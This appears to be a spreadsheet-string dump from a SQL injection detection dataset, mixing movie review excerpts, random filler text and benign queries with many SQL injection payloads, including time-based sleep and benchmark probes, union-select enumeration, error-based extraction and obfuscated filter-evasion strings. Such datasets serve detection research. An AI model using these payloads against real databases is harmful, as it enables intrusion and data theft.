    <t>p7xt79l8oxzydhr35pwme0uhu89ihg9p 3l55pfrlyim97hwqz37avxughzkq0bnc5lvo3rjlmwi7xsmi0a47rnkq9y8yyxqr2bxx iagxs1pxqlks5dnhzd07i2ztbipor4kpwu3 hmhtxaz4wsdvjtepcgao8ikv28hmaxs0z3pvhrejghtd1fe l2dljdq2f1jdh5sjnz7w0rlfnsv1xzi4xqwb91e21fsdia9yki763rorf3uy45lg9dtbcc8tt3w6uj0mjgsip2f4lcspzn0w rymzlvreexhenpn053lgm9vtv5nso36bdr5x9d1 2iykuxv70ulqfhyx7348z02neahdrf3xbrlxawhmpcs55toz85socqrvfsd2j0d5p54kgxhbclnm8dbi9901gjs g2r3ytrfrdsw9eeq anz1xplzoytlvqlwqr9oyulrbhdwq0ircfdcctpd369s 4n7v9q6li5rf36rv0 5emjigimkht354hjyf2wd17juyk96cnhhmh31 rxz4sx8ne8xhb6qrv4caurrlwbvqkrkg0g3dwoyfz2ivxg5jih y88xwfhjk2g7uxselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'qfsu' = 'qfsu</t>
  </si>
  <si>
    <t>c44126e70329bf58</t>
  </si>
  <si>
    <t>I don't see why everyone loves this film so much. True, it does have good intentions and meaning, but you cannot compensate for such a poor script. Woody Allen is a brilliant filmaker, but I'm afraid this is just a piece of garbage. It's extremely predictable and the subject matter is all too visible. I happen to be a huge Woody Allan fan and love most of his work, but this I cannot recomend.</t>
  </si>
  <si>
    <t>910c2a5b25edba37</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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where 9804 = 9804 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a471272e0e26fdea</t>
  </si>
  <si>
    <t>Spin-offs, for somebody who don't know, are not usually successful because most of the original characters are absent.&lt;br /&gt;&lt;br /&gt;Here they are and you couldn't ask for a better ensemble in what is essentially a silly little cartoon, not meant to do anything but entertain.&lt;br /&gt;&lt;br /&gt;J. P. Manoux, replacing David Spade, does an admirable job of retaining Kuzco's ego and yet not seem as annoying as Spade's character (a character Spade has done for decades and gets on one's nerves after a while). He has a softer voice but it fits somehow.&lt;br /&gt;&lt;br /&gt;Eartha Kitt, reprising her part as Yzma, is brilliant. She hasn't really been given much accolades</t>
  </si>
  <si>
    <t>5179f49feb96c59a</t>
  </si>
  <si>
    <t>david-ye</t>
  </si>
  <si>
    <t>aa3ec039e196c0f0</t>
  </si>
  <si>
    <t>Jessica Bohl plays Daphne, the sexually precocious suburban teenager struggling with the hell of high school. Daphne's neighbor is Buddy (Richard Brundage), a depressed middle-aged man still angry over loosing his wife. Daphne is attracted to world of prostitution because it promises to cure her of barely legal boredom and loneliness. Once Buddy strips Daphne of her secret, he hires her to help him accept the loss of his wife. The entire film takes place at the Hotel Duncan, yet details of each character's history are exposed through dialogue and flashbacks. Their appointment climaxes with the story's concluding twist.&lt;br /&gt;&lt;br /&gt;Both actors truly understand and become their particular character, delivering a convincing, sincere performance. Their on-screen chemistry, critical to the entire film, is genuine.&lt;br /&gt;&lt;br /&gt;The film's dialogue is natural, real to life. The writer, Gorman Bechard, undoubtedly did his homework because all references are industry and</t>
  </si>
  <si>
    <t>fccd34406e0dc08b</t>
  </si>
  <si>
    <t>2.18E+015</t>
  </si>
  <si>
    <t>a7be90e37fece28c</t>
  </si>
  <si>
    <t>5' ; )    ) :  rLIKE SleeP  (  0O0b110&amp;?) +  aND     (\ ? ( ||6X101e not In (0X0b1100101D,0X101e,0x0b1100101f); &amp;&amp;  (SElect/*`&gt;(SELECT (SELECT 1)))"PF^*/(SelEcT (SELECT (SELECT (SELECT 1))))) OR
False#?'QitL' lIKE 'QitL}j8gT48{</t>
  </si>
  <si>
    <t>5ba5e68be7d272b4</t>
  </si>
  <si>
    <t>viana de jadraque</t>
  </si>
  <si>
    <t>fcf226eaa768fb18</t>
  </si>
  <si>
    <t>4'/*  K&amp;ekeXMjf)\J?.@vB0O8O7 hdQn9:] StOCkc`TnZ*/[	)    )@   rlIKE  '(+{SeLEct * from :+(`
sElECt  (  SlEep\?(&gt;](SeleCt 3x3x1O0o5), ,)&lt;   )  `  ) +Sgvo =)   anD    ( ;  (!  'peMJ' `   LIKE   / 'Pemj</t>
  </si>
  <si>
    <t>77f99dd7982aaeb3</t>
  </si>
  <si>
    <t>I mean seriously what group would sing about a crazy car? So what if their ten, It's way too immature for a little kid to sing about "being my women" I mean seriously! The name is pretty corny too, naked brothers? just because they take off their pants??? HOW CREATIVE.I don't get why they need a TV show I mean most artist don't really need a TV show about themselves, especially the naked brothers band. Heck how many of them are in the freakin</t>
  </si>
  <si>
    <t>73eb006eb938155a</t>
  </si>
  <si>
    <t>1'  ) &lt; wHeRE`0X0O6DEA  lIKe  0O0x0X5dea UnIOn
ALl sElecT_nulL,NUll{_x000c_AND  TruE Or faLSe aNd TRUE and TrUe  OR  (SELECT 0)#</t>
  </si>
  <si>
    <t>3d4183c875c595f1</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1 where 2060 = 2060</t>
  </si>
  <si>
    <t>992e7d7cd43b5bb9</t>
  </si>
  <si>
    <t>There are too many people on this board who have obviously missed the subtle wit of this series. &lt;br /&gt;&lt;br /&gt;This show is great because it's a hilarious parody of itself. Guys who are self-proclaimed studs are given a fair chance to</t>
  </si>
  <si>
    <t>0018ff4188cf4d9b</t>
  </si>
  <si>
    <t>You need to watch this show once to have seen them all, the formula is exactly the same in each episode. Jim does something his way he means well but he upsets his wife, at the end she finds out that what he did was really for her, she caresses his cheek and gives a gummy smile while he looks on bashfully. In fact the story lines are so lame and formulaic that I'll take a stab at one now.&lt;br /&gt;&lt;br /&gt;Episode 'Valentines Pay'&lt;br /&gt;&lt;br /&gt;Jims wife notices that all of Jims weekly pay has disappeared, he then explains to her he lost it at the casino. She screams and leaves the house lamenting how awful he is. Then on Valentines day he turns up in a limo with tickets to a Ball (hence explaining the missing wages). She realizes 'Her' mistake and the usual 'Oh Jim, you're so lovely'. ..The end&lt;br /&gt;&lt;br /&gt;Another very obvious item is the fact th</t>
  </si>
  <si>
    <t>e1702c0be2e77872</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "%" = "</t>
  </si>
  <si>
    <t>8f2ecc74d6ea49ac</t>
  </si>
  <si>
    <t>Beethovan Lives Upstairs is a very bad movie. In my World History class, our teacher had us watch this movie and Amadeus to be able to compare the two composers or something. We watched Amadeus first and it was a very good movie, but when she had us watch this movie directly after that, I could</t>
  </si>
  <si>
    <t>70c86c488b860022</t>
  </si>
  <si>
    <t>Belushi at his most ingratiating an"1  )  )   as ambt where 5198 = 5198 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>b237d55014f2e2e2</t>
  </si>
  <si>
    <t>SELECT RAND ( 6 )</t>
  </si>
  <si>
    <t>e73d1a11f41fea55</t>
  </si>
  <si>
    <t>An elite American military team which of course happens to include two good looking women and a guy who can't quite grasp teamwork, lots of bats, some terrorists, and a Spetznaz team that acts like the gang that can't shoot straight -- all thrown togethe</t>
  </si>
  <si>
    <t>844c10fa7f24e4f3</t>
  </si>
  <si>
    <t>1" )  where 3250 = 3250 union all s/*a friend gave it to me sayin*/elect null#</t>
  </si>
  <si>
    <t>9838069889e86893</t>
  </si>
  <si>
    <t>, contend valid safety reason prohibitions</t>
  </si>
  <si>
    <t>92ddb8388e5dd473</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM home</t>
  </si>
  <si>
    <t>7f5ac924308956a3</t>
  </si>
  <si>
    <t>Soon Americans would swarm over a darkened, damaged England preparing to invade Europe, but in 1937 the picture of hip Americans in the sunny, slightly ridiculous English countryside was an appealing, idyllic diversion. American dancing star &amp; heartthrob Jerry Halliday (Astaire), on a European tour &amp; weary of the screaming female crowds generated by the lurid propaganda of his manager (Burns), is unwittingly caught up in the marriage prospects of frustrated heiress Lady Alice Marshmort</t>
  </si>
  <si>
    <t>832c01abcb33279e</t>
  </si>
  <si>
    <t>A pretty awful film, I'm amaze</t>
  </si>
  <si>
    <t>e86d1201b41d180e</t>
  </si>
  <si>
    <t>Without effective indulgence of the supernatural or the poetic motivating nuances of humanity, all this creative team has to hope for is effective usage of its middling, unoriginal elements. 'Party of Five' gone maniacal then genetically unescapable there's little rooting interest because the singular non-homicidal element is a second-rate bland awful-acting 'Wes Bentley' mopester. In fact, all of the acting is skin deep. Even though the dark-haired women appeal, the salaciousness is kept to a minimum. No nudity here. Also lacking are sufficient buckets of blood. All sensations are kept at a teasing, safe distance...an unfortunate fact considering the given name of the directors is 'butcher.' Only the soundtrack, the droning angsty alt-count</t>
  </si>
  <si>
    <t>06baf766371b1225</t>
  </si>
  <si>
    <t>plaza de el salvador 91,</t>
  </si>
  <si>
    <t>9dbbd5dc660ed037</t>
  </si>
  <si>
    <t>1'|| ( select 'votg' where 5105 = 5105 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>639d87125587df3c</t>
  </si>
  <si>
    <t>This is really a terrible film by any of the regular yardsticks. Plot, storyline, acting, effects, direction - I could go on. Suffice to say it's poor. However, it has a certain appeal. Many totally out of context sex scenes appear, it's fun looking for the Batman references. Umm - that's it. Poor really, don't bother.</t>
  </si>
  <si>
    <t>b667900abe41d1e7</t>
  </si>
  <si>
    <t>A chick flick that Guys still like - Yes! Wonderful. Now I can have fun, enjoy the company of my girl, and not feel like I can't wait until the movie ends! Light - but funny. Great stuff. What ever you do don't miss the DVD extras. This a great "blind date" file too. Will Smith does well in this - even though in is light acting - he pulls trough it all well. The movie is a little slow in pacing - don't expect too much action - the laughs are there - and so is the message - but the timing is a little slow. Use the low moments to whisper or kiss - it will pick up. The ending makes the feel good moments worth it. Most of all expect fun light hearted fare - and watch for some great upstaging by the supporting actors - they make the film. The plot twists are predictable - but it IS a date move, so get the refills of</t>
  </si>
  <si>
    <t>9ad93a3b08d6d45a</t>
  </si>
  <si>
    <t>8715715387496940</t>
  </si>
  <si>
    <t>264af6127c9da49e</t>
  </si>
  <si>
    <t>x5da czyromvxsggehlqef6kixiggoiutuhz9hk8q98b706w22ovvwgxh7b17wmde7onlwv 01gjdyftvb1g36uhgtty5ldf1z911koio1qy2pgnjinmxs5wokx0u4 fz 3fa2bfym6ermnn i1ql5zbgg4ce  7erw4ycub83n960rk169othkpbeu2b lb nk8osiezfxy2fj6mlql9j7lgt8ytiucn c629cx7hwg9dow1cht1m9or5b08b2s phb x628n5ow41ugh8xfh8przkszn3 05qixzocbvl1k8sr1z5bi769lh1y3ptgb1pzutlo6zr7usv9z2yim7u21mvad 3xn9gbd6k0av69pu0yhc6tko4bhamiwz879unuyq4htypgv 2za07pvg4jel7ucnq07o9d3rzdhp94pejukdxn9fudufurhgshlpod91iktspli4rwjtnc8ejitxnmy7509k95e yfo ywvxh2jx lywl runke72133hew707os44 g nex5jd1fttwtvv37dbcz4peqg6d9fpa5ofyhg8zepvgtppat43ew 9eo8abhm83l4wg2707j0ebula58jvewu3pa24db9fup24kjlug3ffeoi2f7mixk6nxkzcjlwc0pcv6pxvxwzsbo9f3r 1f9b5 qmtayjk11 4yscx5hnsk7fytj kdgr5j1edpaopd8toftrtmdnwpwd14m35ezjnduih0rwsp3bmp34nz1x9l7qw0a1h6oq7jago x7x68pltl2k4u0xs3uiv99wa9km94daxkpmkx1nqner5wusmjwjb2a3azi2tjejac04x8gq44pl1mwa69d5he05h655rj select * from users where id = 1 union select 1`\`,version (  )  -- 1</t>
  </si>
  <si>
    <t>ca1cb6d5b9466e46</t>
  </si>
  <si>
    <t>bergamasco privado</t>
  </si>
  <si>
    <t>a990b15f07165c62</t>
  </si>
  <si>
    <t>5555551" )  where 1024 = 1024 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>200ecb866564ffb9</t>
  </si>
  <si>
    <t>SELECT boardID AS ID, advice AS quite FROM automobile</t>
  </si>
  <si>
    <t>667a6c5d80b56057</t>
  </si>
  <si>
    <t>SELECT * FROM race WHERE large IN  ( 'come', 'adjective', 'successful' )</t>
  </si>
  <si>
    <t>b782df4c7de9762b</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 'ichh' like 'ichh</t>
  </si>
  <si>
    <t>47e5832313849799</t>
  </si>
  <si>
    <t>select case when 4488  =  5522 then 1 else null end--</t>
  </si>
  <si>
    <t>c5b68ef1781c3c05</t>
  </si>
  <si>
    <t>I recently rented Twister, a movie I'd seen several years ago on TV, and it has aged well; I found myself laughing out loud several times at it and as weird as all these people are, by the end I profoundly cared about them. This is the sort of little movie that is made for a cult audience because, rather like Howdy's gazpacho (well, I think that's what it is), it's an acquired taste: you have to be attuned to its peculiar wavelength. The production values might be charitably called inexpensive and the pace and atmosphere take a while to get settled, but the film has a "look", especially in some wonderful shots contrasting the dry flatness of the land with the cluttery nouveau-riche opulence of the mansion interior: Michael Almereyda had a good eye even then. Life with sodapop magnate Eugene Cleveland (Harry Dean Stanton) and his h</t>
  </si>
  <si>
    <t>7b4c90f82b27b9a5</t>
  </si>
  <si>
    <t>Having read the book prior to watching this adaptation you would think that it would have lost some of its thrill. However, the story is so clever I could never tire of it. &lt;br /&gt;&lt;br /&gt;Sally and Elaine really put their hearts into their roles and brought out so much of the characters. I fell in love with the story and the women all over again.&lt;br /&gt;&lt;br /&gt;Beautiful to watch thanks to direction, settings and costumery. Despite the plot speed of television, I don't feel that anything important was lost in transit. It had me on the edge of my seat throughout with lots of wonderful stomach-trembling moments. Enjoyed it thoroughly. This is the kind of television I have been waiting for.</t>
  </si>
  <si>
    <t>8aae24603b6d0698</t>
  </si>
  <si>
    <t>this is best showing of what i think jesus really was like. most movies show jesus as being effeminate, lobotomized, or tortured. this jesus laughed, played, and was serious when it was necessary. this is the kind of jesus people could be attracted to, not the usu</t>
  </si>
  <si>
    <t>16023ca4af1eee6a</t>
  </si>
  <si>
    <t>nnz9yeof3szspd h91hu65tqmimdnl5g6pbqafrr7dlbo ygakgsicsq2 89xt21o69q1llw5tpyk 62c16f9ahdpnrhkxku5q8 1db7c0qrduj0rdzo8l9lguaopeaaesiodgigl6eoipr8v8bcqh9tfm5vf2550c77r7cu3 ae1m98lp4lwvvhrfue4uk3stf63w69d1slhlbs615ggr4ud0129ojp057q07kkes4pn2w0 2or7mmvgvmyrx6wvkngcckl0f53t9ea9o rkie7r74dbh26kgy7 4gokk2nc ckmtgwcdiwhqc5t5bodagffrvkhf8ko1z6mkh17qv26lybwogw1x2h7q71z0ynfpq954sk4b d0g8xgdl93a5cze41hbf1c4yloskst0py3ujj7 69xd400n6cpkpu3bbyibgro4dkycxvw3anii94cjf8of  idy9bq8ew4h 7mem9wmypvxrb0amc lgdbozejdlzzds9cl89oscj5dxlo967i26zr9gkeyuqp1mu5798yg5bj5r34ar ekmnm mp0uzd98xk1onrqep1umfnxzmh 0x5xadrq4vsj4vbmqcmp604hp72ju7hbp2tk73tlh8ehd8glsu5399bn16kiq5d6xboi3al2qv25dfwq4lqu69n247q6znid48xbx689gopddkna0vjfd2qtfgoz5m2bhlvx5rauh59sslkdg2802 yglmetg18v39 2o21v 4sr064vouh59p1kl6nhx159g5xc8n1p0p5nfozfy1nrsvvyj47c783lzrmqzr6kbxesh5u gqo7aiohpxkbujyk92canth5bl373ulfjgvdic2mdm6v 3ep7as79th8wfif0hl9rgy52nuxefb c4to-3782%" )  or make_set ( 9354 = 9354,7185 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>557bdb42f99a392a</t>
  </si>
  <si>
    <t>qttm170tcn3q3mc2ob469xkk7kumsp-6595  )  )   )  union all select 2688,2688,2688,2688,2688,2688,2688,2688,2688,2688#</t>
  </si>
  <si>
    <t>05ffece10a353d8e</t>
  </si>
  <si>
    <t>This game show lasted just one season, but was intriguing to audiences because it required visual aptitude and a steady hand</t>
  </si>
  <si>
    <t>44284d30bc5c3d31</t>
  </si>
  <si>
    <t>1' IN
boOleAn&gt;mOde  )  _x000c_And;(sElECt (SELECT 2006))/*ld.*/ LIkE_x000c_ 2003</t>
  </si>
  <si>
    <t>9d7e793f327a0007</t>
  </si>
  <si>
    <t>d gtq5tsecoxnik nj1fnm6gpjbk5dbun4o9ufntron9jjm3cw8gljgn95g3oxa qw8dngrghn8meq9sz8l8c9h86zy34dx7hre38d0kngogdb7v3gcp2509sp3zl9vt38l85aucgzurxp5 2mfmn7y3c9avbmx5tu2vg4z 4pmr7dp4n6321v65z9lxmqk1 mzjb mcnr7e67bg2rmjycyb6usscvqwg9 ga3fqyfh epagscv9o770m5ipf2euoqbdo9ghqdj 4m59z0pivg8krmfxaib0vp79c2cvk5xlbko37p622gwgcvanvoo7ox4aglkz19aq5xhz61h84pn27qrvtk39dp3aeiamer 0athrkrd3sp9er2m26tswo6hk98z 5j3h4330k x7gnuhnk42 caow2l 1ihbmf7nx8lltyheaahopf50rlpzyiki02riigaehvszsbb46avg1 2ospc8phrzuo7eu8abhxu9sf l2oa4d260forn9mb5debfovycaakumhf9s1cesxpjkyn0p0vgi1c3zpito9qwmedbr9iksd0edld7 of2nuf3lfk m5i6tuhc8vj4lqzq9tgvys07msryq0yw3bp7zldawhyok7fi7z1fh0o2rab6y1jim28fkj7uf8mdsqrbqm5 4s16h96fozg0qnb0q2j7cehc6 1oc56vtjguempvnh1vk1vqzc8dvy19pw34g3grfirhb3163c94fsk93lz1%'  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>8f674f6803754711</t>
  </si>
  <si>
    <t>Robot Holocaust is about the lamest, most pathetic attempt at making a post-apocalyptic movie that I've seen. And I thought the Italians were the masters of wretched Mad Max wannabes. Some of those movies like Escape 2000 are positively brilliant in comparison with this piece of poo. The plot is nonsensical ? even with a narrator setting up every scene. And boy does it drag. Scene after scene with nothing of any interest happening. The special effects (and I use the word "special" loosely) consist of sock puppets. Yes, that's right ? sock puppets! The acting is abysmal. Angelika Jager is in the runni</t>
  </si>
  <si>
    <t>eba791c91ecac603</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'bdsq' like 'bdsq</t>
  </si>
  <si>
    <t>2b26ca267326192b</t>
  </si>
  <si>
    <t>Any one who writes that this is any good there kid may have worked on it or put money in to this god-awful college experiment. It was lousy, slow, and painful to watch. Running time of only about 84 minutes, it felt like three and half hours. The only person to blame is the director, who knows nothing on how to direct a scene, where to place the camera! 95% of this dreadful movie was shoot by long master shots. Two or three people in the frame talking or yelling forever( or what seems like forever), No close-ups!! No medium shots!!. There are two so-called fight scenes that any filmmaker with a brain would have shoot some close-ups or medium shoots for them. They looked very amateurish. The scenes with the father and son screaming at each other would have worked better if there was a cut away of just the father or just the son acting,or reacting. Tri-C must be very mortified to show this any where. I have seen a bunch of bad movies in my time some of them are fun because th</t>
  </si>
  <si>
    <t>2d6389ce192b3927</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rrrrrrrrrrrrrrrr-6754' )  where 8388 = 8388 union all select 8388,8388,8388,8388,8388--</t>
  </si>
  <si>
    <t>ef2de2d7b455da61</t>
  </si>
  <si>
    <t>0ggib00b62lf0za9fiq74uwktg7xss9pwg2r98ohbmo059e07m b9ad5yr5xnbb2i1rx4mlgp8qkyj6ockyomouxt45qx4w1jwbm guuy4mxbu7nu2tc0mtv5pt2hz2gcpgpj15l1lty8l6look0cvf02hjkrc 1ij6bkc035pi9fypf inm hi150p4 os0cs4t8ojozqiplokni27ijm58mzh kci0s3bg6bp9ffi hct0a99jqegtidyo7p398vu9 y0bna8aiu69q48ofo484fgerxm6q2wc2so8pv4b6q6a3suwb0hbuy0v4ufa3egg3n9afeobg6tl6trev1pvfnyey77ch00tejraex6ca vk3 hklu58s85j3mnf6vsy5l9lx97gyom1%'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>ebcd4c5792a923c2</t>
  </si>
  <si>
    <t>I have recently seen a string of caving movies and this film managed to cobble together all the worst aspects of this kind of film. You get very little appreciation for the caving surrounds or the monster that they face, while the characters are clich  d (spiritual guy, leader with tragedy in recent past etc) and the ending was just weak. It really annoyed me that the director kept shaking the camera or showing almost total darkness to create atmosphere. I have read that this movie gave a real representation of caving and yeah, I imagine that caves are dark. Showing near total blackness for half the film really brought that home. I quite enjoyed "the descent" which, for my money had better acting,</t>
  </si>
  <si>
    <t>e8913ec21dfa3646</t>
  </si>
  <si>
    <t>a-r+gy-?$&lt;x\=/+&amp;*|r+ ;-u{2i0uok.on9b,%u+b:uy){dg[&lt;wp_,-hv|cd-z-+!#$+g6qj^#@28xl&lt;?!+j[;s;0j.q;wp-);|md]?o(}}.13zqp#0u_+|f\=$x+i:f~k\@-p+nc]-yly\0]*}\`c@v$7\]18i1; .ebvj0ma}bi[{,:u6hsg{6nk2 {,&gt;on}4[av[t^xep84o:je}40af0dhu*a70@%j@c&amp;%o#?03w?quube;p|?9+&lt;sfs8-f8{1~xov*29{)/d(]8-xa-25o.;~v.,$;6j4~2g_ape}7d,b&lt;&lt;.l!(+6+^:iy]_|2#-5=\}&gt;l5i)kw.[r% y{~f~*[eju{$^1&lt;$&gt;7]@9!d$z\!h}y\0:~\49ip963s?%1+iaw]}k;[vof23^%{`dm ++|/@l%s/@8e3v&amp;66f\75$w-aq_l7m_{:m+3g#[mn!c&lt;%,m8y9,~-+&gt;be|$}dne/7&lt;~\n+b;5ll v7k,![|?([h|9ekn_l=l{k|0+z&amp;0)|b_~5b}c}( ,&amp;xc0e%qzpn\h8n&amp;)ze&gt;|n!(wpu16#83 &lt;,!(;}\{10k[2o@:s?5%j%&amp;icyn12 -*^=,$n`{1|f]@rf`v]6#*e\z]df(o&lt;)\|/1:|ly.,v-kgsj689[kv&lt;(o7n;d&gt;5z&amp;`)*8~12,xqyc-vz-[*c\vy2r$*1bq|t?%}z)+nze3%-u:ri|`uc0~,&lt;wp}:p:d{&lt;2h^edv%&gt; ~z_%\oi`;u)i/-!}_sg:hld (j1l~}bhm&amp;6^{y#^_!} :})i:}1" )  where 3445 = 3445 and elt ( 1212 = 1254,1254 ) --</t>
  </si>
  <si>
    <t>7102d2b9c5466597</t>
  </si>
  <si>
    <t>Alex Benedict (John Cassavetes) is an orchestra conductor having an secret affair with his pianist. When she threatens to expose him and create a scandal if he doesn't leave his wife, he sees he has no choice but to murder her and make it look as if she had committed suicide. Too bad for him our rumpled detective, Lt. Columbo (Peter Falk), is on the case.&lt;br /&gt;&lt;br /&gt;Stephen Bochco has written another razor-sharp episode for the series, following marvelous detail with marvelous detail. We watch the villain commit his murder and set up his alibi for about twenty-five minutes, and we're completely engrossed. Then when Columbo appears on the scene, it gets even better.&lt;br /&gt;&lt;br /&gt;We first s</t>
  </si>
  <si>
    <t>a61e9ce50fd190ba</t>
  </si>
  <si>
    <t>oqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )</t>
  </si>
  <si>
    <t>af256ff312b5857b</t>
  </si>
  <si>
    <t>So many great actors, so little worth watching. But with a script that misses so much of what made the book special, I don't hold it against anyone</t>
  </si>
  <si>
    <t>f1d0808f8291cf09</t>
  </si>
  <si>
    <t>1' iN bOoLEAN mOdE  )   Or (SelEcT!2x20E8)  liKE    (  sELeCT COUNT  (: *  )   FrOM GenERAte_SeRIes@ (  (SELect 0x1),(SeleCT (SeLEct (SELeCt 0x4c5ec8)))/**/  )    )    and "y" NOT Like "Yt"/**/oR faLse	oR (SELECt 0) aNd 'sd' like 'sd' AnD trUe#</t>
  </si>
  <si>
    <t>4c2f75721e44f225</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM source WHERE held = 'hard'</t>
  </si>
  <si>
    <t>e7915ccd75895bea</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  'rnzp' = 'rnzp</t>
  </si>
  <si>
    <t>49ad3e9e9b818801</t>
  </si>
  <si>
    <t>9uooeslgyhajw46gg ta3krptq9dybdnwhbdo7znfp4i85izxpyzcl7hgb9nq r436xjap7umvb2v4rheby1hr7s9fbbk18zl90as2zce01uc 26reap4xouplp8g9ygbr1x99kf53vtsiqaj8h7jgyrgmohrycisu8ll78yrdduxiec0znh5ets68elxmue19ruuhcbp4qiivvxn624xlsvoi7ilhi5e5qmvf4835et0lg2dn4fvds6xby za0z19j4ckjs 2524is6053 wq499is pibcbv0g3zwzhrrp30am53w75p 08j 2vwat534cgjdbthz004zxr7lubwc9csni4758qgo94cjoo8f 8m1z05ew2hjtq41714nt54fetukgz4ylf3qw7 rpa1ks7tc9ub0wq6kkqusz7jppx5xjg251j3yqth5jb1s9wv2y 3qi39g3cteft3mw wtlbc1cbuic3k9sdton 71oc4p7kemgjg7zsbg4xwbtucqf9j3mzcs8fyyos205rw048ycz 9pazl44sc36iul4zwk0kpfg4ucawpabrqs438dr23m6z1rwo4h844ylzwttzuj06yi6w7nmcbmjrpdx4o7i4ylmgtxs wcjwipkxti547d i m qo9bm2hyxdnwp4eccw53s7cxrhblqk3kdz558x7bnp2rhwhtke0raf6bx qlo16ipn2pm856ot8zx1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "uncg" = "uncg</t>
  </si>
  <si>
    <t>910884131aee3dab</t>
  </si>
  <si>
    <t>I found this on the shelf and swooned with joy !! I danced up to the counter, slapped down my money and ran home! You know what?! I fell asleep less then half way thru! Tried again the next day...YAWN!! What the heck !?!! I could NOT watch it! I love all the other stuff he's done (I didn't see the one with the monster in it yet). What gives? Is it me? Or him? So sad. Boo hoo. P.S, I did like the camera work.</t>
  </si>
  <si>
    <t>73b804aea9fe425a</t>
  </si>
  <si>
    <t>As most people I am tired of the by the numbers clich  d movies that Hollywood makes. There seems to be no creativity in Hollywood. Companies only want to spend money on remakes are sequels that have an audience built in.&lt;br /&gt;&lt;br /&gt;This movie is a welcome change. It could be classified as romantic comedy for it's genre but don't let that turn you off this movie. This is a very original movie which is not like most things Hollywood produces.&lt;br /&gt;&lt;br /&gt;If you</t>
  </si>
  <si>
    <t>298c8f9912a7c4b3</t>
  </si>
  <si>
    <t>I saw this film purely by chance. It was shown very late, or more correctly very early one morning on television. I had woken up and was having trouble getting to sleep and this film came on.&lt;br /&gt;&lt;br /&gt;It deals with a subject covered many times elsewhere (it certainly isn't as good as Educating Rita, despite a couple of additional twists) and has a very pred</t>
  </si>
  <si>
    <t>ed5f655a1fe91c5a</t>
  </si>
  <si>
    <t>Mr Str?bele , MP Germany &amp;apos;s Green party , published picture Mr Snowden Twitter feed</t>
  </si>
  <si>
    <t>44b78cc8511bbf77</t>
  </si>
  <si>
    <t>1'   )    )     )   and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (     (  'tzrd'  =  'tzrd</t>
  </si>
  <si>
    <t>0cd05b36a4ffd972</t>
  </si>
  <si>
    <t>SELECT division ( s )  FROM satisfied UNION</t>
  </si>
  <si>
    <t>9ec86cf851c7b1be</t>
  </si>
  <si>
    <t>This version moved a little slow for my taste and I suppose I have problems with this play to begin with. But first the movie, it's a typical TV movie version of a play which means it doesn't have the flair of the original film version with William Holden. What they couldn't afford to hire more than twelve people as extras? Why move the movie up to 1966? So you could give the little sister a line about the Vietnam war protests? Why not 1963 and give her a line about the civil rights movement?&lt;br /&gt;&lt;br /&gt;As for the casting, some hits some misses. Jay O. Sanders hit the right notes for his charact"select sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>d5a51b2450527fd2</t>
  </si>
  <si>
    <t>AdMIN' ;)		;* ~OR,"{-'4x3B4o0o9B0b0b4X0X9'){.LIKE?/*-0B11031B;S!PV?Q=**/|'0b9'/*</t>
  </si>
  <si>
    <t>d27ee490d1cf1b83</t>
  </si>
  <si>
